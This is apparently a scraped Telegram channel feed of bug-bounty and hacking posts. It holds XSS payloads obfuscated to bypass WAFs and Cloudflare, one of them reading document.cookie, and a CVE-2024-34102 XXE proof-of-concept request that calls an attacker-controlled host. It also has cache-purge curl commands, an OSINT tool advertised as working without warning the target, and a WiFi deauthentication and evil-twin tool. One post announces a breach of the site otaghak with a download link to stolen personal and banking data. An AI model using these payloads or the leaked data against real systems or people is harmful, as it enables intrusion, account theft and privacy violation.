Bypassing WAF through a large number of characters is a successful method

#Bypass #Waf
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

🕵️ Eyes is an OSINT tool to get existing accounts from an email

About:
Eyes is osint tool based on account search from an email address

Eyes is able to find not only if an account is existing on different sites but also to find the account in question (with certain modules)

even if the profile has nothing to do with the email 😲!

All this without warning the target 🕵️‍♂️

📊 Features of noscript:
⚪️ fully async
⚪️ asynchrone scraping
⚪️ menu in cli format (commands)


📂  Requirements / Launch:
⚪️ Python 3
⚪️ Git
⚪️ New terminal (to display emojis) # only for windows

💻 Usage:

usage: eyes.py [-h] [-m] [email]

positional arguments:
  email          search information on the target email with modules, services...

options:
  -h, --help     show this help message and exit
  -m, --modules  gives you all the email modules used by Eyes

😸 Github

⬇️ Download
🔒 BugCod3

#Osint #Email
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

payload

<img+src=oNlY=1+ onerror="alert(['a', 'x', 'b', 'x', 'c', 's'].map(c => c.replace(/[abc]/g, '')).join(''))">

<img+src=oNlY=1+ onerror="alert(['x', String.fromCharCode(121), 'x', 's'].filter(c => c.charCodeAt(0) !== 121).join(''))">

#Payload
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

CVE-2024-34102 POC

POST /rest/V1/guest-carts/1/estimate-shipping-methods HTTP/2

{"address":{"totalsCollector":{"collectorList":{"totalCollector":{"sourceData":{"data":"http://attacker*com/xxe.xml","dataIsURL":true,"options":1337}}}}}}

#CVE #POC
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

A Cloudflare WAF bypass combining simple (but efficient) tricks

<img%20hrEF="x"%20sRC="data:x,"%20oNLy=1%20oNErrOR=prompt`1`>

A payload with some obfuscation & filter evasion tricks

<img/src/onerror=setTimeout(atob(/YWxlcnQoMTMzNyk/.source))>

#CF #WAF #Bypass #Payload
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

SSRF localhost aliases

#SSRF #Local
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

Bug-Bounty-Wordlists

⬇️ Download
🔒 BugCod3

#BugBounty #Wordlist
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

This is how a Cybercriminal exploits phone calls to steal Data/OTP using IVR.

#News #Scam #Alert
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

excludeparked

💬
A lightweight Python 3 noscript that filters out parked HTTP domains from a list of domains. Useful when pulling a list of domains from a reverse WHOIS lookup service (from a tool such as WHOXY).

This was tested on a list of 100k parked domains but it's subject to improvement as this tool is intended to be a rough method of filtering down thousands of domains in the recon phase of a pentest.

🔼 Install:

cd excludeparked
pip install -r requirements.txt

💻 Usage:

python3 ./excludeparked.py -h

😸 Github

⬇️ Download
🔒BugCod3

#Python #Parked #Domain
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

Simple Low-Hanging Bug:
Cache purge requests are not authenticated.

→ curl -X PURGE https://target[.]evil[.]com

→ curl -s -D - https://target[.]evil[.]com -o /dev/null

#BugBounty #Tips
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

XSS WAF Bypass by multi-char HTML entities

fj translates to fj
>⃒ translates to > + [?]
&nvlt; translates to < + [?]

[?] - Unicode symbol

#BugBounty #Tips
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

dnsX

A fast and multi-purpose DNS toolkit designed for running DNS queries

💬
dnsx is a fast and multi-purpose DNS toolkit designed for running various probes through the retryabledns library. It supports multiple DNS queries, user supplied resolvers, DNS wildcard filtering like shuffledns etc.

📊 Features:
⚪️ Simple and Handy utility to query DNS records.
⚪️ A, AAAA, CNAME, PTR, NS, MX, TXT, SRV, SOA query support
⚪️ DNS Resolution / Brute-force support
⚪️ Custom resolver input support
⚪️ Multiple resolver format (TCP/UDP/DOH/DOT) support
⚪️ stdin and stdout support
⚪️ Automatic wildcard handling support

🔼 Installation:
dnsx requires go1.21 to install successfully. Run the following command to install the latest version:

go install -v github.com/projectdiscovery/dnsx/cmd/dnsx@latest

💻 Usage:

dnsx -h

😸 Github

⬇️ Download
🔒 BugCod3

#cli #dns #bruteforce #wildcard
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

AlterX

Fast and customizable subdomain wordlist generator using DSL.

📊 Features:

⚪️ Fast and Customizable
⚪️ Automatic word enrichment
⚪️ Pre-defined variables
⚪️ Configurable Patterns
⚪️ STDIN / List input

🔼 Installation:
To install alterx, you need to have Golang 1.19 installed on your system.

go install github.com/projectdiscovery/alterx/cmd/alterx@latest

💻 Examples:
An example of running alterx on existing list of passive subdomains of tesla.com yield us 10 additional NEW and valid subdomains resolved using dnsx.

chaos -d tesla.com | alterx | dnsx

Similarly -enrich option can be used to populate known subdomains as world input to generate target aware permutations.

chaos -d tesla.com | alterx -enrich

You can alter the default patterns at run time using -pattern CLI option.

chaos -d tesla.com | alterx -enrich -p '{{word}}-{{suffix}}'

It is also possible to overwrite existing variables value using -payload CLI options.

alterx -list tesla.txt -enrich -p '{{word}}-{{year}}.{{suffix}}' -pp word=keywords.txt -pp year=2023

😸 Github

⬇️ Download
🔒 BugCod3

#BugBounty #Subdomain #Generator #DSL
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

We have created this topic for you members, so that if you have something to share, you can do it and work together as a group. I also suggest that if there is something missing in our channel or topic, tell us as soon as possible. We will quickly fix it or provide it for you

📣 Channel: T.me/BugCod3
👤 Group: T.me/BugCod3GP
📊 Topic: T.me/BugCod3Topic
👤 Contact: T.me/BugCod3BOT

🥬 BADUnboxing 🥬

💬
BADUnboxing is an automated Android unpacker. It works by locating and decompiling code inside the APK that is relevant to the unpacking process.
Once Bad Unboxing detects packing, it automatically generates a new Java application based on the decompiled code. This new application can be executed to drop dynamic unpacked artifacts to disk.

📊 Contribute:
⚪️ Make a pull request
⚪️ Add a new Unpacking Module
⚪️ Add an Example to our Wiki
⚪️ Report an error/issue
⚪️ Suggest an improvement
⚪️ Share with others or give a star!

😸 Github

⬇️ Download
🔒 BugCod3

#JAVA #Unpacker #Android
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

Payload XSS:

<IFRAME SRC="javanoscript:prompt(document.cookie);"></iframe>

#Payload #XSS
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

📢 The otaghak was hacked by irLeaks!


In short, we have the following:

- reservation information; including name and surname, reservation date, length of stay, payment fee, national code, contact number, email, etc.
- settlement information; Including the amount, bank information, denoscription, date
- messages and chats; including activation code or password, support messages and...
- Information including username, password, first and last name, gender, contact number, national code, IP address, user agent, etc.
- Payment information including payment denoscription, payment date, amount, payer information
- detailed information of bookable places; including exact address, longitude and latitude, city, zip code, etc.
- User search information including city, province, search filters, search time frame, amount, user ID, IP address, etc.
- Bank information including name and surname of the account holder, user name, Shaba number, bank name, card number
- Discount coupons and other general information

⬇️ Sample:
https://mega.nz/file/SFskzKBR#jmEvTv8RiAQqdeanoDbVisAgzgKyuDEA-eUxIES8ebU

#NEWS #Notifaction #irleaks #otaghak
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

🛜 Freeway 🛜

WiFi Penetration Testing & Auditing Tool

💬
Freeway is a Python scapy-based tool for WiFi penetration that aim to help ethical hackers and pentesters develop their skills and knowledge in auditing and securing home or enterprise networks.

📊 Features:
⚪️ IEEE 802.11 Packet Monitoring
⚪️ Deauthentication Attack
⚪️ Beacon Flood
⚪️ Packet Fuzzer
⚪️ Network Audit
⚪️ Channel Hopper
⚪️ Evil Twin
⚪️ Packet Crafter

📂 Preparation:
⚪️ A network adapter supporting monitor mode and frame injection.
⚪️ An operating system running a Linux distribution.
⚪️ Python 3+ installed.

🔼 Installation:
PIP:

sudo pip install 3way

Manually:

cd Freeway
sudo pip install .

💻 Usage:

#1 sudo Freeway
#2 sudo Freeway -i wlan2 -a monitor -p 1,2,a
#3 sudo Freeway -i wlan2 -a deauth

😸 Github

⬇️ Download
🔒 BugCod3

#Python #Wifi #Pentesting
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

Tips for XSS Bypass:

https://sub.target.com --> 403 (Forbidden)
https://sub.target.com/%3f/ --> 200 (OK)

dork for the vulnerable parameters

`site:*.target.com inurl:"?name="`and `site:*.target.com inurl:"?type="`

#BugBounty #Tips #XSS
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3